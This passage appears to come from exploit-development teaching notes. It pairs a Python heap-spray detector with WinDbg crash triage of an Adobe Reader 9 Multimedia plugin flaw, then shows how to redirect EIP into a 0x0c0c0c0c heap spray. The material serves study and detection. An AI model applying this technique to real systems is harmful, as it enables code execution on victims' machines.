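# unescape("%uXXXX%uXXXX...") literals with at least two UTF-16 units
UNESCAPE_U = re.compile(r'unescape\s*\(\s*["\']((?:%u[0-9a-fA-F]{4}){2,})["\']\s*\)')
# while(x.length < N) x += x   (the doubling loop that builds the sled)
DOUBLING = re.compile(r'while\s*\(\s*(\w+)\.length\s*<=?\s*(0x[0-9a-fA-F]+|\d+)\s*\)\s*\{?\s*\1\s*\+=\s*\1\b')
# for(...; i < COUNT; ...) arr[i] = a + b   (the loop that fills the array)
FILL_LOOP = re.compile(r'for\s*\([^;]*;\s*\w+\s*<\s*(\d+)\s*;[^)]*\)\s*\{?\s*(\w+)\s*\[\s*\w+\s*\]\s*=\s*(\w+)\s*\+\s*(\w+)')


def decode_unescape(units):
    """Turn %uXXXX units into the bytes they occupy in memory (UTF-16LE code units)."""
    return b"".join(int(u, 16).to_bytes(2, "little")
                    for u in re.findall(r"%u([0-9a-fA-F]{4})", units))


def analyze(script):
    """Extract heap-spray indicators from JavaScript text and estimate the sprayed size."""
    sled_bytes = []
    for m in UNESCAPE_U.finditer(script):
        raw = decode_unescape(m.group(1))
        if len(set(raw)) == 1:               # every byte identical: a NOP/int3/0c0c-style sled
            sled_bytes.append(raw[0])
    doubling = DOUBLING.search(script)
    fill = FILL_LOOP.search(script)
    blocks = int(fill.group(1)) if fill else 0
    block_chars = int(doubling.group(2), 0) if doubling else 0
    # the doubled string is what every array slot receives, so this bounds the spray from below
    est_bytes = blocks * block_chars * 2    # 2 bytes per JS string character in memory
    same_string = bool(doubling and fill and doubling.group(1) in (fill.group(3), fill.group(4)))
    return {
        "sled_bytes": sled_bytes,
        "doubled_var": doubling.group(1) if doubling else None,
        "blocks": blocks,
        "estimated_bytes": est_bytes,
        # thresholds are an assumption: 10+ blocks totalling at least 1 MiB
        "heap_spray": same_string and blocks >= 10 and est_bytes >= 1 << 20,
    }


if __name__ == "__main__":
    for label, script in (("vlc1.html", SPRAY_VLC), ("mnp2.pdf", SPRAY_PDF), ("benign", BENIGN)):
        r = analyze(script)
        print(f"{label}: spray={r['heap_spray']} blocks={r['blocks']} "
              f"~{r['estimated_bytes'] >> 20} MiB sled bytes={[hex(b) for b in r['sled_bytes']]}")
```

The same regexes work on JavaScript pulled out of a PDF's /JS stream as on an HTML page, which is why one detector covers both sections; the size estimate is what separates a spray from an ordinary array-building loop like the benign sample.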
We want to see what led to the crash.

EIP is invalid, so we can't disassemble around EIP.

We need to trace the function that called us and crashed.
- STACK TRACE
- dumps all the frames from the top of the stack
- shows you the series of calls that led up to the crash
- we will analyze the topmost function on the stack

WinDBG - stack trace - "k" command

0:000> k
ChildEBP RetAddr  
WARNING: Frame IP not in any known module. Following frames may be wrong.
0013fb34 2d843117 0x90909090
0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
0013fbdc 23825d8c EScript!PlugInMain+0x25584
0013fc74 238257e2 EScript!PlugInMain+0x249dc
0013fca4 238543c5 EScript!PlugInMain+0x24432
0013fd04 00a78de1 EScript!PlugInMain+0x53015
0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
0013fe24 00a323b4 USER32!DispatchMessageW+0xf
0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
0013ffc0 7c817067 AcroRd32+0x4004
0013fff0 00000000 kernel32!BaseProcessStart+0x23

2d843117 -- the return address that we would have returned to, if we didn't crash.
A few bytes before 2d843117 (start at 2d843117-2) there will be the CALL instruction that got us here.

u 2d843117
u 2d843117-2
u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
u 2d843117-4

0:000> u 2d843117-3
Multimedia!PlugInMain+0x41b66:
2d843114 ff5204          call    dword ptr [edx+4] <---- the culprit!!!
2d843117 6a00            push    0
2d843119 68d8b68c2d      push    offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
2d84311e 56              push    esi
2d84311f e842aefdff      call    Multimedia!PlugInMain+0x1c9b8 (2d81df66)
2d843124 83c40c          add     esp,0Ch
2d843127 66b80100        mov     ax,1
2d84312b 5e              pop     esi

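Walking back from a return address to its CALL, as done above with `u 2d843117-2`, `-3`, `-4`, can be automated. The Python below is an added example, not part of the original notes: it tries every length from 2 to 7 bytes before the return address and keeps only the candidates that decode as a CALL ending exactly at the return address, which is what makes `-3` the right answer and `-2`/`-4` wrong ones. The code bytes are those shown in the `u 2d843117-3` and `u 2d843117-7` listings on this page; the decoder handles only the E8 rel32 and FF /2 (`call r/m32`) encodings, so other instructions are deliberately reported as "not a call".

```python
REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Sample copied from the WinDbg listings above, starting at Multimedia!PlugInMain+0x41b62.
SAMPLE_BASE = 0x2d843110
SAMPLE_CODE = bytes.fromhex(
    "8b10"          # 2d843110  mov edx,dword ptr [eax]
    "8bc8"          # 2d843112  mov ecx,eax
    "ff5204"        # 2d843114  call dword ptr [edx+4]
    "6a00"          # 2d843117  push 0
    "68d8b68c2d"    # 2d843119  push offset 2d8cb6d8
    "56"            # 2d84311e  push esi
    "e842aefdff"    # 2d84311f  call 2d81df66
    "83c40c"        # 2d843124  add esp,0Ch
    "66b80100"      # 2d843127  mov ax,1
    "5e"            # 2d84312b  pop esi
)


def decode_call(code, off, addr):
    """Try to decode an x86-32 CALL at code[off], which lives at virtual address addr.
    Returns (length, text) or None. Handles E8 rel32 and FF /2 (call r/m32); operands
    with a SIB byte are sized correctly but printed generically."""
    if off < 0 or off >= len(code):
        return None
    op = code[off]
    if op == 0xE8:                                # call rel32: target = next instruction + rel
        if off + 5 > len(code):
            return None
        rel = int.from_bytes(code[off + 1:off + 5], "little", signed=True)
        return 5, "call %08x" % ((addr + 5 + rel) & 0xFFFFFFFF)
    if op != 0xFF or off + 2 > len(code):
        return None
    modrm = code[off + 1]
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if reg != 2:                                  # /2 selects CALL within the FF opcode group
        return None
    if mod == 3:                                  # call reg
        return 2, "call " + REGS32[rm]
    length = 3 if rm == 4 else 2                  # rm=100 means a SIB byte follows the ModRM
    absolute = (mod == 0 and rm == 5)             # mod=00 rm=101 is [disp32] with no base register
    disp_size = 4 if absolute else {0: 0, 1: 1, 2: 4}[mod]
    if off + length + disp_size > len(code):
        return None
    disp = int.from_bytes(code[off + length:off + length + disp_size], "little", signed=not absolute)
    length += disp_size
    if rm == 4:
        return length, "call dword ptr [sib%+d]" % disp
    if absolute:
        return length, "call dword ptr [%08x]" % disp
    if disp == 0:
        return length, "call dword ptr [%s]" % REGS32[rm]
    return length, "call dword ptr [%s%s%x]" % (REGS32[rm], "+" if disp > 0 else "-", abs(disp))


def find_call_site(code, base, ret_addr, max_len=7):
    """Candidates (address, text) for the CALL that returns to ret_addr: each start between
    ret_addr-max_len and ret_addr-2 that decodes as a CALL ending exactly at ret_addr."""
    hits = []
    for n in range(2, max_len + 1):
        start = ret_addr - n
        decoded = decode_call(code, start - base, start)
        if decoded and decoded[0] == n:
            hits.append((start, decoded[1]))
    return hits


if __name__ == "__main__":
    for ret in (0x2d843117, 0x2d843124):
        for site, text in find_call_site(SAMPLE_CODE, SAMPLE_BASE, ret):
            print(f"return address {ret:08x} <- {site:08x}  {text}")
```

With the bytes from the page, the only candidate for return address 2d843117 is the `call dword ptr [edx+4]` at 2d843114; the second return address (2d843124, after the E8 call) checks that relative-call targets are computed the way WinDbg shows them (2d81df66).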
We control EDX
edx=0c0c0c0c

call [edx+4] = call [0c0c0c10]
dd edx+4

0:000> dd edx+4
0c0c0c10  90909090 90909090 90909090 90909090
0c0c0c20  90909090 90909090 90909090 90909090

0:000> u 2d843117-7
Multimedia!PlugInMain+0x41b62:
2d843110 8b10            mov     edx,dword ptr [eax]
2d843112 8bc8            mov     ecx,eax
2d843114 ff5204          call    dword ptr [edx+4]

dd eax

0:000> dd eax
02e2d680  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
02e2d690  42424242 42424242 42424242 42424242
02e2d6a0  42424242 42424242 42424242 42424242
02e2d6b0  42424242 42424242 42424242 42424242
02e2d6c0  42424242 42424242 00000000 00000000

mnp3.pdf

change the NOPs 90909090 to 0c0c0c0c

mov edx, [eax]
call [edx+4]

edx = 0c0c0c0c
edx+4 = 0c0c0c10
contents at edx+4 will also be "0c0c0c0c"

EIP will jump to 0c0c0c0c

and...

0:000> u 0c0c0c0c
*** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api - 
0c0c0c0c 0c0c            or      al,0Ch
0c0c0c0e 0c0c            or      al,0Ch
0c0c0c10 0c0c            or      al,0Ch
0c0c0c12 0c0c            or      al,0Ch
0c0c0c14 0c0c            or      al,0Ch